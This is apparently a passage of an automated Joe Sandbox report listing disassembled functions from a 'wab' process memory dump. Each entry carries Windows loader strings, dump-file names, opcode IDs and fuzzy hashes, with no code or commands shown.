                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-2558761708
                    • Opcode ID: 5bf5cf91fa77a8893d5aad4523495990e22ac3aba68160e55997ee5b9aeb431e
                    • Instruction ID: d9a87d884ba31f7ec96defb47f754e6a9acfa143070d90bc0600413cb8e885cf
                    • Opcode Fuzzy Hash: 5bf5cf91fa77a8893d5aad4523495990e22ac3aba68160e55997ee5b9aeb431e
                    • Instruction Fuzzy Hash: 6B11DF333150869FD71ACB28C484F56B7BBEF4172EF158229E40ADB259DB30E841C792
                    Function 213F20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                    Download Yara Rule
                    Strings
                    • minkernel\ntdll\ldrinit.c, xrefs: 213F2104
                    • LdrpInitializationFailure, xrefs: 213F20FA
                    • Process initialization failed with status 0x%08lx, xrefs: 213F20F3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-2986994758
                    • Opcode ID: 3c5847f4cf6c14ee548e3d9a6acb2c54e4c7e74c053a7667a17dd18073942a94
                    • Instruction ID: 6e39131cafd51ab7137a32203b517be85a619db2c76a5cfe0acddf5b43d65f68
                    • Opcode Fuzzy Hash: 3c5847f4cf6c14ee548e3d9a6acb2c54e4c7e74c053a7667a17dd18073942a94
                    • Instruction Fuzzy Hash: 2FF0C8B9640248BFE710DA4DCC52F9A3BAEFB45B5CF100059F60467381D6B4A900C695
                    Function 213803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: #%u
                    • API String ID: 48624451-232158463
                    • Opcode ID: 2752be05fda394055be78ad15746ba8a7b733c023f68a067624c48327e68bd51
                    • Instruction ID: 69f457f6d152fc8f6121f36f358ce0da64d98d568d7a90f8942e67b5629f32a1
                    • Opcode Fuzzy Hash: 2752be05fda394055be78ad15746ba8a7b733c023f68a067624c48327e68bd51
                    • Instruction Fuzzy Hash: F1714A72A0114A9FDB05CFA8C990FAEB7FAAF18708F154165E905E7251EB34EE05CB60
                    Function 2137A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                    Download Yara Rule
                    Strings
                    • LdrResSearchResource Enter, xrefs: 2137AA13
                    • LdrResSearchResource Exit, xrefs: 2137AA25
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                    • API String ID: 0-4066393604
                    • Opcode ID: ad09dd125b9f95a03bb4e56f77856a4da183778c9ea6fa1a7d6655d0302b958f
                    • Instruction ID: 6d04a65151a036aff6632827a69e5ea38c2d014b4b684ca21f515d5fbc8406b7
                    • Opcode Fuzzy Hash: ad09dd125b9f95a03bb4e56f77856a4da183778c9ea6fa1a7d6655d0302b958f
                    • Instruction Fuzzy Hash: 02E18172E04219AFEB12DFA9CD80B9EBBBFBF15358F140469E901E7251D7788942CB50
                    Function 2143A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: `$`
                    • API String ID: 0-197956300
                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                    • Instruction ID: 16a20023cf884635a3cd1951e98a4bde34663bb1a9b55d5473dfcc217f29b114
                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                    • Instruction Fuzzy Hash: A6C1DE312443429FE715CF28C840B6BBBE5AFD9758F344A2EF69ACA290D774D505CB82
                    Function 213EE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Legacy$UEFI
                    • API String ID: 2994545307-634100481
                    • Opcode ID: 9df9ea2d30193f0fb511459a78d3550b5b545476896d5ad1486ba6e44e8bf6c5
                    • Instruction ID: 6c05a3e213d7370fd0f056c182d8dfc9674cc3bfd0ed882fdadc6fd8b10b3ea3
                    • Opcode Fuzzy Hash: 9df9ea2d30193f0fb511459a78d3550b5b545476896d5ad1486ba6e44e8bf6c5
                    • Instruction Fuzzy Hash: C7612B72E003299FDB15CFA88854AADBBFABF48748F20407DE659EB251D731A900CB50
                    Function 214143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$MUI
                    • API String ID: 0-17815947
                    • Opcode ID: cb2e33c6f77fb56dbf1ab2635e2cf1e3ba5795582da7ab9cd3e84f3937d899a4
                    • Instruction ID: 874e9b9de494800b047a88f6b291695115f58f6071f6d4b741420436d6cb5f5e
                    • Opcode Fuzzy Hash: cb2e33c6f77fb56dbf1ab2635e2cf1e3ba5795582da7ab9cd3e84f3937d899a4
                    • Instruction Fuzzy Hash: EF512871E0021DAEDF01CFA9CC80FEEBBB9EB44798F140529E615B7294E7309A05CB60
                    Function 213704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                    Download Yara Rule
                    Strings
                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2137063D
                    • kLsE, xrefs: 21370540
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                    • API String ID: 0-2547482624
                    • Opcode ID: 8386e0dddbc0244f2a4247d8bf57a2819a93633a6bebc5a81aa11262c9fa555f
                    • Instruction ID: 223443e5122e933cd135d7ca61e931b0df31f36e8534ddb703d946c6407e2ea7
                    • Opcode Fuzzy Hash: 8386e0dddbc0244f2a4247d8bf57a2819a93633a6bebc5a81aa11262c9fa555f
                    • Instruction Fuzzy Hash: A251BF71504742CFD314DF68C490697BBF6EF86328F10483EEAA987241E778E646CB92
                    Function 213AA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Cleanup Group$Threadpool!
                    • API String ID: 2994545307-4008356553
                    • Opcode ID: b0ca4e8888351fea7a2600984ee79a9b992ba2557e28366c857f4fae1a9e297b
                    • Instruction ID: 31401aac5b035816f0bfed2cb8579e9f03f7c255a00ac1a340c9882b71d41eb9
                    • Opcode Fuzzy Hash: b0ca4e8888351fea7a2600984ee79a9b992ba2557e28366c857f4fae1a9e297b
                    • Instruction Fuzzy Hash: EC01A9B3550744AFD311CF28CE45B16B7E9E7A4729F008939E65CC72A0E738E804CB86
                    Function 2137C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: MUI
                    • API String ID: 0-1339004836
                    • Opcode ID: 8c10f87794c4768ae8b80272985edc2017dba1114ca145c9c2d5b219dd8088a0
                    • Instruction ID: 06bb2d1bbc1b57d81dc18918e9c9381ab6c25edb8f7e839f0d1e7caa62decf88
                    • Opcode Fuzzy Hash: 8c10f87794c4768ae8b80272985edc2017dba1114ca145c9c2d5b219dd8088a0
                    • Instruction Fuzzy Hash: D1827F75E0021DCFEB15CFA9C880BEDBBB6BF45358F108169E919AB290D7399942CF50
                    Function 213F6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 4990c33e54f90305e1f6761f0dea68830de61fadb9ed295afa994296729ec697
                    • Instruction ID: 99217b03d49c93f6cde6b152fae0aea37862a4eca726f8c94d1a4336ce319ccb
                    • Opcode Fuzzy Hash: 4990c33e54f90305e1f6761f0dea68830de61fadb9ed295afa994296729ec697
                    • Instruction Fuzzy Hash: 299175B2A01219AFDB11CF99CC85FAE7BBAEF15754F110069F604BB191D775AD00CB90
                    Function 213AA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: GlobalTags
                    • API String ID: 0-1106856819
                    • Opcode ID: 7861e05958bb3c7313a56c2f741451755e113e55e67359c823646f060c254f70
                    • Instruction ID: 26932ee8cf664fe38410bbae9e347ce4087178721edd2456214edf5d9f5011e2
                    • Opcode Fuzzy Hash: 7861e05958bb3c7313a56c2f741451755e113e55e67359c823646f060c254f70
                    • Instruction Fuzzy Hash: BF717FB5E0032ACFDB18CF98C594A9DBBB6BF59718F10812EE509A7242E7319941CB90
                    Function 21414978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: .mui
                    • API String ID: 0-1199573805
                    • Opcode ID: bc98d28a66693949915b970fc17b32e82198f9e571ef59fce5847e369e45a73b
                    • Instruction ID: c2a988fcbb225e9dd56690feb69a02a3184f4d36a67502d948adf13ee6d4443d
                    • Opcode Fuzzy Hash: bc98d28a66693949915b970fc17b32e82198f9e571ef59fce5847e369e45a73b
                    • Instruction Fuzzy Hash: 9E519372D0122A9FDF00CF99D840BAEBBB9BF15B54F494169E919BB344D7388D01CBA0
                    Function 21438B28 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: PhF!
                    • API String ID: 0-1187492603
                    • Opcode ID: bb5da68f93339b11a0a702b6cb39198a10ab037bf023ef7eac9bf9bbcf30f6c2
                    • Instruction ID: 36b18d280a7007a47aa793081a176b29db116ee5eb3b40be02f5ea0af12aa60b
                    • Opcode Fuzzy Hash: bb5da68f93339b11a0a702b6cb39198a10ab037bf023ef7eac9bf9bbcf30f6c2
                    • Instruction Fuzzy Hash: 8541B0707056439BE6198B29C890B6BFB9AAFD9760F30832DF95D87381DB34D901C691
                    Function 2138E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: EXT-
                    • API String ID: 0-1948896318
                    • Opcode ID: 9f9d9c413c3c8887104ccf7fda6f585f4ecce6fb39360887ad8bc122ee1599e9
                    • Instruction ID: c9a39a7c3ea348ffaa3cbae0bb32dde21119d13c7e5bfb3652832f99b5a3dab1
                    • Opcode Fuzzy Hash: 9f9d9c413c3c8887104ccf7fda6f585f4ecce6fb39360887ad8bc122ee1599e9
                    • Instruction Fuzzy Hash: 9B418D72508312AFD711EB75C880B5BBBEEAF8871CF12093DF994E7180E634DA048796
                    Function 2139EBFC Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: \F!
                    • API String ID: 0-2763206271
                    • Opcode ID: a6afa0fb947c92aaf573ca39abee94f02c5b596be6086e13a7882d1e47a2665b
                    • Instruction ID: a395fbaf524fe57d5a1e65a55b2d57a3876f7e100be1547cb0a45db00f7ad5d8
                    • Opcode Fuzzy Hash: a6afa0fb947c92aaf573ca39abee94f02c5b596be6086e13a7882d1e47a2665b
                    • Instruction Fuzzy Hash: 43419C722043469FDB10CF28C980A4BB7EABB8832CF114939E996C7611EB35E949CB51
                    Function 21370BCD Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: pfF!
                    • API String ID: 0-3966447823
                    • Opcode ID: b62e8727f4af1e312ae0c86a2da271bb5ac7fdb901ff6a7ee372d7e6cf5e590e
                    • Instruction ID: 2fd42c6a51cf2b08c11b02633ab25ca52a4c9a1915d60f368495937d378ddb7e
                    • Opcode Fuzzy Hash: b62e8727f4af1e312ae0c86a2da271bb5ac7fdb901ff6a7ee372d7e6cf5e590e
                    • Instruction Fuzzy Hash: 3841B171A00229DFCF21DF68C944BDA7BBAAF46B44F0100A9E908AF241D774DE81CF91
                    Function 213EC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: BinaryHash
                    • API String ID: 0-2202222882
                    • Opcode ID: 22e709eae9ba3d60810f278b40ee6b04abc7b35892d76ae499c1c91c756d3ab9
                    • Instruction ID: d946c58f3faf91f0a51988775641d5a3df3a14c0f69d619e4685fc1a098a6192
                    • Opcode Fuzzy Hash: 22e709eae9ba3d60810f278b40ee6b04abc7b35892d76ae499c1c91c756d3ab9
                    • Instruction Fuzzy Hash: F84143B1D0122DAEDB21CB54CD84FDE777DAF45718F0045E5AA18AB140EB709E888B95
                    Function 2139A470 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @3F!
                    • API String ID: 0-1983325237
                    • Opcode ID: e4ff7282ef338e84d4cf97105f9b133d71745202335be531e2a2bdd1d66cf9e8
                    • Instruction ID: 1fba371d010d6498e4c09b7465de965017f7667ea9b87144ef37114c00fb345d
                    • Opcode Fuzzy Hash: e4ff7282ef338e84d4cf97105f9b133d71745202335be531e2a2bdd1d66cf9e8
                    • Instruction Fuzzy Hash: E2419D32A40249CFDF05CF68C490BDD7BBAFB1935CF5402A9D415AB296DB389900CBA0
                    Function 21406B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: #
                    • API String ID: 0-1885708031
                    • Opcode ID: 6f727c342260df7eabf5567b49fb154ddc76d32b6070d7d4b5ac568a1a30b639
                    • Instruction ID: d5899747acf02812e4e27179f93e187bb4c8bc628c7057349133ab219536120c
                    • Opcode Fuzzy Hash: 6f727c342260df7eabf5567b49fb154ddc76d32b6070d7d4b5ac568a1a30b639
                    • Instruction Fuzzy Hash: EB316C31A047299FE726CB2AC840BDE7BB9DF05304F10403CE90A9B381D775D941CB90
                    Function 213ECA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: BinaryName
                    • API String ID: 0-215506332
                    • Opcode ID: bdb0acf788481d65690a31b7d1930c485edb9847e00b1bdb8c1eaeb1bf3e574c
                    • Instruction ID: 34b3a1121babe00a06dee47dab43a157e583e9766ffa42b82fa1c928b6ef8ad4
                    • Opcode Fuzzy Hash: bdb0acf788481d65690a31b7d1930c485edb9847e00b1bdb8c1eaeb1bf3e574c
                    • Instruction Fuzzy Hash: B6312936D0162EAFEF06CB58C859EAFBB7AEF41718F014169E919A7250D7309E00D7D0
                    Function 213F892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                    Download Yara Rule
                    Strings
                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 213F895E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                    • API String ID: 0-702105204
                    • Opcode ID: 0be547308a92b4f957a606e6ea17b2e27d76b7c1f0215e5cdb48043051c9fc2f
                    • Instruction ID: df5a92d21e46c19ad3ba0a79e84546126196e9ebd10b7ba039103b18a92e4311
                    • Opcode Fuzzy Hash: 0be547308a92b4f957a606e6ea17b2e27d76b7c1f0215e5cdb48043051c9fc2f
                    • Instruction Fuzzy Hash: B001F232200241AFE7184F55CCC4E9B7BABEF9639CB20147CF6451A161CF34A881CB92
                    Function 21412000 Relevance: .8, Instructions: 757COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67317fbcd3414b7931a0a4bf80aadac441f28a30bf4724f3b08ba49660938c0d
                    • Instruction ID: e0f76126d1f36a3db1fdedc028ad9d4fbca4db652b6232a15a2bdd331e6612b6
                    • Opcode Fuzzy Hash: 67317fbcd3414b7931a0a4bf80aadac441f28a30bf4724f3b08ba49660938c0d
                    • Instruction Fuzzy Hash: F642AB366083419FE715CF68C890E6BBBEAAB89344F24092DFE89D7358D730D9458F52
                    Function 21408158 Relevance: .6, Instructions: 617COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5dd79cf652cc002f1b3ef73060a4cace00f99ec987a3b3c251eeb8542d918186
                    • Instruction ID: fff7eacb25bb2c4b08b9264f5a0da219cceceac9468a2df2cabaab06a33588f0
                    • Opcode Fuzzy Hash: 5dd79cf652cc002f1b3ef73060a4cace00f99ec987a3b3c251eeb8542d918186
                    • Instruction Fuzzy Hash: 16424D75E0021A8FEB14CF69C941BADBBF6BF89314F1580ADE94CAB242D7349985CF50
